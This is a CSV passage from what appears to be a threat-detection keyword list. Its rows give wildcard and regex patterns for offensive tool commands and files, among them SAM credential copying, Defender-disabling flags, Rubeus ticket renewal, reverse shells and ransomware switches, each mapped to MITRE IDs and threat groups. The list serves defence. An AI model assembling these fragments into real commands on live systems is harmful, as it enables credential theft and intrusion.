"* RemoteKeyLogger.dll*",".{0,1000}\sRemoteKeyLogger\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","2841"
"* Remotely download Trojan files to *",".{0,1000}\sRemotely\sdownload\sTrojan\sfiles\sto\s.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","2842"
"* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*",".{0,1000}\s\-RemotePath\s.{0,1000}\\Windows\\System32\\SAM\s\-LocalPath\s.{0,1000}\\tmp\\.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","2843"
"* RemotePotato0.zip*",".{0,1000}\sRemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2849"
"* --remote-ransomware*",".{0,1000}\s\-\-remote\-ransomware.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2850"
"* remoteshell.py*",".{0,1000}\sremoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2851"
"* --remote-to-local socks://*",".{0,1000}\s\-\-remote\-to\-local\ssocks\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2852"
"* --remote-to-local tcp://*",".{0,1000}\s\-\-remote\-to\-local\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2853"
"* --remote-to-local udp://*",".{0,1000}\s\-\-remote\-to\-local\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2854"
"* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*",".{0,1000}\sremove\sdevice\sGUID\:001B2EE1\-AE95\-4146\-AE7B\-5928F1E4F396.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2855"
"* -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}\s\-RemoveDefinitions\s\-All\sSet\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","2856"
"* renameMachine.py *",".{0,1000}\srenameMachine\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2857"
"* renew *.kirbi*",".{0,1000}\srenew\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2858"
"* renew */ticket:*",".{0,1000}\srenew\s.{0,1000}\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2859"
"* repo -u https://github.com/*",".{0,1000}\srepo\s\-u\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","2860"
"* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","2861"
"* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","2862"
"* req -username * -p * -ca * -target * -template * -upn *",".{0,1000}\sreq\s\-username\s.{0,1000}\s\-p\s.{0,1000}\s\-ca\s.{0,1000}\s\-target\s.{0,1000}\s\-template\s.{0,1000}\s\-upn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2863"
"* -request -dc-ip *",".{0,1000}\s\-request\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2864"
"* -request -format hashcat -outputfile *",".{0,1000}\s\-request\s\-format\shashcat\s\-outputfile\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2865"
"* request_shellcode.exe*",".{0,1000}\srequest_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2866"
"* --requirement *Exegol/requirements.txt*",".{0,1000}\s\-\-requirement\s.{0,1000}Exegol\/requirements\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2867"
"* resolveall.nse*",".{0,1000}\sresolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2868"
"* restart dnscrypt-proxy*",".{0,1000}\srestart\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","2869"
"* --RestoreShadowCred*",".{0,1000}\s\-\-RestoreShadowCred.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","2872"
"* restoresig.py*",".{0,1000}\srestoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","2873"
"* --restrict-to localhost:* wss://*",".{0,1000}\s\-\-restrict\-to\slocalhost\:.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2874"
"* resu ten*",".{0,1000}\sresu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2875"
"* Retrieving NTLM Hashes without Touching LSASS*",".{0,1000}\sRetrieving\sNTLM\sHashes\swithout\sTouching\sLSASS.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","2876"
"* --return_output --as_logged_on_user --cmd *",".{0,1000}\s\-\-return_output\s\-\-as_logged_on_user\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","2877"
"* rev_shell.py*",".{0,1000}\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","2878"
"* -Reverse -IPAddress * -Port *",".{0,1000}\s\-Reverse\s\-IPAddress\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","Invoke-PowerShellTcp args","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","2879"
"* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2880"
"* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","N/A","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2881"
"* reverse-index.nse*",".{0,1000}\sreverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2882"
"* ReverseShell.ahk*",".{0,1000}\sReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2883"
"* reverse-shellcode.cpp*",".{0,1000}\sreverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","2884"
"* --revshell*",".{0,1000}\s\-\-revshell.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","2885"
"* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","2886"
"* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2887"
"* revshell.py*",".{0,1000}\srevshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","2888"
"* revshell32.bin*",".{0,1000}\srevshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2889"
"* revshell64.bin*",".{0,1000}\srevshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2890"
"* -RevToSelf *",".{0,1000}\s\-RevToSelf\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2891"
"* rexec-brute.nse*",".{0,1000}\srexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2892"
"* rfc868-time.nse*",".{0,1000}\srfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2893"
"* rfs_injection.exe*",".{0,1000}\srfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2894"
"* -Rhost * -WARFile http*",".{0,1000}\s\-Rhost\s.{0,1000}\s\-WARFile\shttp.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2895"
"* -Rhosts * -Password * -Directory * -Dictionary *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Password\s.{0,1000}\s\-Directory\s.{0,1000}\s\-Dictionary\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2896"
